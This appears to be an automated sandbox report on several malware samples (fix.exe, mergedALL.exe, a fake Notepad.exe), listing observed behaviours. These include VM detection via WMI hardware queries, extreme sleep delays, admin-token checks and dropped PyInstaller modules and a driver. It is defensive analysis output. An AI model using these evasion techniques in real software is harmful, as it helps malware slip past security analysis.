Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Notepad.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: 1650000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: 3400000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: 19C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fix.exe Memory allocated: F80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fix.exe Memory allocated: 2A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fix.exe Memory allocated: 4A10000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4139 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7375 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 388 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Window / User API: threadDelayed 1032 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Window / User API: threadDelayed 1943 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 577
Source: C:\Users\user\AppData\Local\Temp\fix.exe Window / User API: threadDelayed 6236
Source: C:\Users\user\AppData\Local\Temp\fix.exe Window / User API: threadDelayed 1424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4124
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\python312.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\select.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\python312.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\python312.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\select.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\select.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\python312.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\select.pyd Jump to dropped file
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Dropped PE file which has not been started: C:\Windows\Temp\trxhxvjzqipl.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76522\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70442\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77162\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80002\_bz2.pyd Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Notepad.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\etc test.exe API coverage: 4.0 %
Source: C:\Users\user\Notepad.exe API coverage: 0.9 %
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe API coverage: 4.0 %
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe API coverage: 3.2 %
Source: C:\Users\user\Notepad.exe API coverage: 0.9 %
Source: C:\Windows\System32\conhost.exe API coverage: 1.2 %
Source: C:\Users\user\Notepad.exe API coverage: 0.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3452 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5820 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep count: 7375 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep count: 388 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe TID: 7816 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe TID: 7172 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 7145 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep count: 577 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 5288 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 5288 Thread sleep time: -45000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 7464 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fix.exe TID: 7352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 4124 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep count: 324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F8AF0 FindFirstFileExW,FindClose, 6_2_00007FF7F04F8AF0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 6_2_00007FF7F05124C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD24C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF702BD24C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB8AF0 FindFirstFileExW,FindClose, 18_2_00007FF702BB8AF0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10310150 GetSystemInfo,VirtualAlloc, 13_2_00007FFE10310150
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
